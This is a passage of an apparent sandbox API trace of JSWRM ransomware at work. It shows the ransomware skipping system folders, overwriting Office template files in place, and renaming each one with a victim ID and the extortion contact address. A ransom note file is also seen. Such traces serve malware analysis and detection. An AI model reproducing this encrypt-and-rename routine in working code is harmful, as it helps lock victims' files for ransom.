| out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="centered.dotx", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centered.dotx", lpUsedDefaultChar=0x0) returned 13 [0120.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0120.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="centered.dotx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0120.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="centered.dotx", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centered.dotx", lpUsedDefaultChar=0x0) returned 13 [0120.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0120.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\centered.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\centered.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.994] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12164) returned 1 [0120.994] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f80) returned 0x24e1d8 [0120.994] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2f80, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2f80, lpOverlapped=0x0) returned 1 [0120.997] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.997] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2f80, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2f80, lpOverlapped=0x0) returned 1 [0120.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.997] CloseHandle (hObject=0x314) returned 1 [0120.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0120.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0120.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0120.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0120.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0120.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.997] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\centered.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\centered.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\centered.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\centered.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0120.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.998] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2387, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="Classic.dotx", cAlternateFileName="CLASSI~1.DOT")) returned 1 [0120.998] lstrcmpiW (lpString1="Classic.dotx", lpString2=".") returned 1 [0120.998] lstrcmpiW (lpString1="Classic.dotx", lpString2="..") returned 1 [0120.998] lstrcmpiW (lpString1="Classic.dotx", lpString2="...") returned 1 [0120.998] lstrcmpiW (lpString1="Classic.dotx", lpString2="windows") returned -1 [0120.998] lstrcmpiW (lpString1="Classic.dotx", lpString2="recovery") returned -1 [0120.998] lstrcmpiW (lpString1="Classic.dotx", lpString2="perflogs") returned -1 [0120.998] lstrcmpiW (lpString1="Classic.dotx", lpString2="documents and settings") returned -1 [0120.998] lstrcmpiW (lpString1="Classic.dotx", lpString2="$RECYCLE.BIN") returned 1 [0120.998] lstrcmpiW (lpString1="Classic.dotx", lpString2="system volume information") returned -1 [0120.998] lstrcmpiW (lpString1="Classic.dotx", lpString2="msocache") returned -1 [0120.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0120.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Classic.dotx", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Classic.dotx", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Classic.dotx", lpUsedDefaultChar=0x0) returned 12 [0120.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0120.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Classic.dotx", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Classic.dotx", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Classic.dotx", lpUsedDefaultChar=0x0) returned 12 [0120.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\Classic.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\classic.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0121.000] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9095) returned 1 [0121.000] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2380) returned 0x24e1d8 [0121.000] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2380, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2380, lpOverlapped=0x0) returned 1 [0121.011] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.011] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2380, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2380, lpOverlapped=0x0) returned 1 [0121.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.011] CloseHandle (hObject=0x314) returned 1 [0121.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0121.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0121.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0121.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0121.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0121.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0121.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0121.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0121.012] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\Classic.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\classic.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\Classic.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\classic.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0121.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0121.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0121.013] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f43, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="Default.dotx", cAlternateFileName="DEFAUL~1.DOT")) returned 1 [0121.013] lstrcmpiW (lpString1="Default.dotx", lpString2=".") returned 1 [0121.013] lstrcmpiW (lpString1="Default.dotx", lpString2="..") returned 1 [0121.013] lstrcmpiW (lpString1="Default.dotx", lpString2="...") returned 1 [0121.013] lstrcmpiW (lpString1="Default.dotx", lpString2="windows") returned -1 [0121.013] lstrcmpiW (lpString1="Default.dotx", lpString2="recovery") returned -1 [0121.013] lstrcmpiW (lpString1="Default.dotx", lpString2="perflogs") returned -1 [0121.013] lstrcmpiW (lpString1="Default.dotx", lpString2="documents and settings") returned -1 [0121.013] lstrcmpiW (lpString1="Default.dotx", lpString2="$RECYCLE.BIN") returned 1 [0121.013] lstrcmpiW (lpString1="Default.dotx", lpString2="system volume information") returned -1 [0121.013] lstrcmpiW (lpString1="Default.dotx", lpString2="msocache") returned -1 [0121.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0121.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Default.dotx", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0121.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Default.dotx", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Default.dotx", lpUsedDefaultChar=0x0) returned 12 [0121.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0121.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0121.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Default.dotx", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0121.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Default.dotx", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Default.dotx", lpUsedDefaultChar=0x0) returned 12 [0121.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0121.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0121.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0121.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0121.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\Default.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\default.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0121.014] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12099) returned 1 [0121.014] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2f40) returned 0x24e1d8 [0121.014] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2f40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2f40, lpOverlapped=0x0) returned 1 [0121.018] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.018] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2f40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2f40, lpOverlapped=0x0) returned 1 [0121.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.018] CloseHandle (hObject=0x314) returned 1 [0121.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0121.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0121.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0121.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0121.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0121.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0121.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.018] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\Default.dotx" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\default.dotx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\QuickStyles\\Default.dotx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\quickstyles\\default.dotx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0121.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0121.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0121.019] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ebb2c52, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3ebb2c52, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3ebd8eb7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0121.019] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0121.019] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0121.019] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0121.019] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0121.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0121.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0121.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0121.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0121.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0121.020] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0121.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0121.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0121.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0121.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0121.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0121.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0121.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0121.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0121.020] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: 